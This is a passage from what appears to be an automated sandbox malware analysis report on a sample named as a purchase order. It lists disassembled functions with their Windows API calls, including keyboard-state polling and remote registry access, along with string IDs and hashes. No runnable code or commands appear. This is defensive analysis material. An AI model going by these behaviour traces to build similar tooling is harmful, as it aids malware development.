                                  • Sleep.KERNEL32(0000000A), ref: 00443B9F
                                  • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00443BC8
                                  • SetActiveWindow.USER32(00000000), ref: 00443BEC
                                  • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
                                  • SendMessageW.USER32(00000000,00000010,00000000,00000000), ref: 00443C22
                                  • Sleep.KERNEL32(000000FA), ref: 00443C2D
                                  • IsWindow.USER32(00000000), ref: 00443C3A
                                  • EndDialog.USER32(00000000,00000000), ref: 00443C4C
                                    • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                    • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                    • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                  • 74285940.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Window$Thread$MessageSendSleepTimetime$74285940ActiveAttachCurrentDialogFindInputProcess
                                  • String ID: BUTTON
                                  • API String ID: 1394735852-3405671355
                                  • Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                  • Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
                                  • Opcode Fuzzy Hash: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                  • Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C
                                  Function 00454014 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 93windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                                  • LoadStringW.USER32(00000000), ref: 00454040
                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                  • _wprintf.LIBCMT ref: 00454074
                                  • __swprintf.LIBCMT ref: 004540A3
                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                                  • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                  • API String ID: 455036304-4153970271
                                  • Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                  • Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
                                  • Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                  • Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
                                  Function 00467C8E Relevance: 18.3, APIs: 12, Instructions: 310COMMON
                                  Download Yara Rule
                                  APIs
                                  • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                                  • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
                                  • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                                  • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                                  • _memmove.LIBCMT ref: 00467EB8
                                  • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                                  • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                                  • _memmove.LIBCMT ref: 00467F6C
                                  • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                                  • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                    • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                  • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                  • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                                  • String ID:
                                  • API String ID: 2170234536-0
                                  • Opcode ID: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                  • Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
                                  • Opcode Fuzzy Hash: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                  • Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A
                                  Function 00453C57 Relevance: 18.2, APIs: 12, Instructions: 190keyboardCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetKeyboardState.USER32(?), ref: 00453CE0
                                  • SetKeyboardState.USER32(?), ref: 00453D3B
                                  • GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
                                  • GetKeyState.USER32(000000A0), ref: 00453D75
                                  • GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
                                  • GetKeyState.USER32(000000A1), ref: 00453DB5
                                  • GetAsyncKeyState.USER32(00000011), ref: 00453DE1
                                  • GetKeyState.USER32(00000011), ref: 00453DEF
                                  • GetAsyncKeyState.USER32(00000012), ref: 00453E18
                                  • GetKeyState.USER32(00000012), ref: 00453E26
                                  • GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
                                  • GetKeyState.USER32(0000005B), ref: 00453E5D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: State$Async$Keyboard
                                  • String ID:
                                  • API String ID: 541375521-0
                                  • Opcode ID: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                  • Instruction ID: 009fbf1908f75ed0a62addf5985db529f64a747a45b1090b1102dc3b9208550d
                                  • Opcode Fuzzy Hash: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                  • Instruction Fuzzy Hash: BC61DD3190478829FB329F6488057EBBBF45F12346F08459ED9C2162C3D7AC6B4CCB65
                                  Function 004357B7 Relevance: 18.2, APIs: 12, Instructions: 184COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetDlgItem.USER32(?,00000001), ref: 004357DB
                                  • GetWindowRect.USER32(00000000,?), ref: 004357ED
                                  • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                                  • GetDlgItem.USER32(?,00000002), ref: 0043586A
                                  • GetWindowRect.USER32(00000000,?), ref: 0043587C
                                  • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                                  • GetDlgItem.USER32(?,000003E9), ref: 004358DC
                                  • GetWindowRect.USER32(00000000,?), ref: 004358EE
                                  • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                                  • GetDlgItem.USER32(?,000003EA), ref: 00435941
                                  • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Window$ItemMoveRect$Invalidate
                                  • String ID:
                                  • API String ID: 3096461208-0
                                  • Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                  • Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
                                  • Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                  • Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
                                  Function 004714D9 Relevance: 18.1, APIs: 12, Instructions: 132windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • 742845F0.USER32(?,000000F0), ref: 004714DC
                                  • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
                                  • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
                                  • DeleteObject.GDI32(?), ref: 0047151E
                                  • DestroyCursor.USER32(?), ref: 0047152C
                                  • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
                                  • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
                                  • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
                                  • DestroyCursor.USER32(?), ref: 004715CD
                                  • SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
                                  • DeleteObject.GDI32(?), ref: 004715EA
                                  • DestroyCursor.USER32(?), ref: 004715F8
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: CursorDestroyMessageSend$DeleteImageLoadObject$742845ExtractIcon
                                  • String ID:
                                  • API String ID: 614556818-0
                                  • Opcode ID: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                  • Instruction ID: 6a50b90733f0312424b7b906018c15bc054940e4c1588362709ca6bab20dc4d5
                                  • Opcode Fuzzy Hash: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                  • Instruction Fuzzy Hash: D2419231740206ABDB209F69DD49FEB77A8EB84711F10452AFA46E72D0DBB4E805C768
                                  Function 00433784 Relevance: 18.1, APIs: 12, Instructions: 119COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                  • String ID:
                                  • API String ID: 136442275-0
                                  • Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                  • Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
                                  • Opcode Fuzzy Hash: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                  • Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5
                                  Function 00467408 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 308COMMON
                                  Download Yara Rule
                                  APIs
                                  • _wcsncpy.LIBCMT ref: 00467490
                                  • _wcsncpy.LIBCMT ref: 004674BC
                                    • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                    • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                  • _wcstok.LIBCMT ref: 004674FF
                                    • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                  • _wcstok.LIBCMT ref: 004675B2
                                  • 758ED0D0.COMDLG32(00000058), ref: 00467774
                                  • _wcslen.LIBCMT ref: 00467793
                                  • _wcscpy.LIBCMT ref: 00467641
                                    • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                    • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                  • _wcslen.LIBCMT ref: 004677BD
                                  • 758ED1A0.COMDLG32(00000058), ref: 00467807
                                    • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: _wcslen$_memmove_wcscpy_wcsncpy_wcstok$__getptd
                                  • String ID: X
                                  • API String ID: 1962976255-3081909835
                                  • Opcode ID: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                                  • Instruction ID: 683e1e2944aeccc99b179fad4e52216d38d827d7da526ed866e93360804c4864
                                  • Opcode Fuzzy Hash: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                                  • Instruction Fuzzy Hash: 69C1C5306083009BD310FF65C985A5FB7E4AF84318F108D2EF559972A2EB78ED45CB9A
                                  Function 00461014 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 255COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetClassNameW.USER32(?,?,00000400), ref: 00461056
                                  • GetWindowTextW.USER32(?,?,00000400), ref: 00461092
                                  • _wcslen.LIBCMT ref: 004610A3
                                  • CharUpperBuffW.USER32(?,00000000), ref: 004610B1
                                  • GetClassNameW.USER32(?,?,00000400), ref: 00461124
                                  • GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
                                  • GetClassNameW.USER32(?,?,00000400), ref: 004611A1
                                  • GetClassNameW.USER32(?,?,00000400), ref: 004611D9
                                  • GetWindowRect.USER32(?,?), ref: 00461248
                                    • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
                                  • String ID: ThumbnailClass
                                  • API String ID: 4136854206-1241985126
                                  • Opcode ID: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                  • Instruction ID: 9bdbaadfe46dce382da1609a4111f175dadd43cf518d3c7fb815d390e9d71813
                                  • Opcode Fuzzy Hash: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                  • Instruction Fuzzy Hash: D991F3715043009FCB14DF51C881BAB77A8EF89719F08895FFD84A6252E738E946CBA7
                                  Function 004718BA Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 147windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
                                  • 6FDA2980.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
                                  • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
                                  • 6FD9C400.COMCTL32(?,000000FF,?), ref: 00471960
                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
                                  • SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
                                  • GetClientRect.USER32(?,?), ref: 00471A1A
                                  • 74285EE0.USER32(?,?,00000000,00000000), ref: 00471A29
                                  • DestroyCursor.USER32(?), ref: 00471AF4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: MessageSend$74285A2980C400ClientCursorDestroyExtractIconRect
                                  • String ID: 2
                                  • API String ID: 3666795388-450215437
                                  • Opcode ID: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                  • Instruction ID: 8a8bfaa361b8e4ad447499ed02e60938d35b352fbee86dd909721fc396438cf5
                                  • Opcode Fuzzy Hash: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                  • Instruction Fuzzy Hash: 19519070A00209AFDB10CF98CD95BEEB7B5FF49310F10815AEA09AB3A1D7B4AD41CB55
                                  Function 0046081F Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 139COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                  • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                  • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                  • __swprintf.LIBCMT ref: 00460915
                                  • __swprintf.LIBCMT ref: 0046092D
                                  • _wprintf.LIBCMT ref: 004609E1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
                                  • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
                                  • API String ID: 3054410614-2561132961
                                  • Opcode ID: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                  • Instruction ID: 8ea7bd36613c7ff98b4c02c5a019b599898316a67ab96f708308d0ed756dbd7a
                                  • Opcode Fuzzy Hash: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                  • Instruction Fuzzy Hash: 654183B29001099BDB00FBD1DC9AAEF7778EF44354F45403AF504B7192EB78AA45CBA9
                                  Function 00458651 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 135registryshareCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                    • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                  • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
                                  • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
                                  • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
                                  • CLSIDFromString.OLE32(?,?), ref: 004587B3
                                  • RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
                                  • RegCloseKey.ADVAPI32(?), ref: 004587C5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
